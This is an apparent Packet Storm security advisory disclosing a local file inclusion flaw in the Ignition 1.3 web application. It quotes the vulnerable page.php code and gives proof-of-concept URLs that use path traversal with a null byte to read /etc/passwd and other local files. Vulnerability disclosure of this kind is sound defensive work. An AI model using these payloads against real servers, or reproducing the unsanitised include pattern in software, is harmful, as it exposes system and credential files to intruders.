Ignition version 1.3 suffers from a local file inclusion vulnerability.
fcef02e9002f319bd32eef9dfa30c74bd4d165c2060f7d0f3e53d6019c7a7990Ignition 1.3 (page) Local File Inclusion Vulnerability
disclosed by cOndemned
download:
http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
note:
1. Magic_quotes_gpc should be turned off in order to exploit this vulnerability
2. LFI bugs found by me in previous version (1.2) are still working in this one
source of page.php
1. <?php
2. session_start();
3. require "data/settings.php";
4. if (file_exists('data/pages/'.$_GET['page'].'.html')) {
5. include ('data/pages/'.$_GET['page'].'.html'); <----- LFI
6. }else{
7. die(
8. require('404.php')); }
proof of concept:
http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../etc/passwd%00
http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../[localfile]%00
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed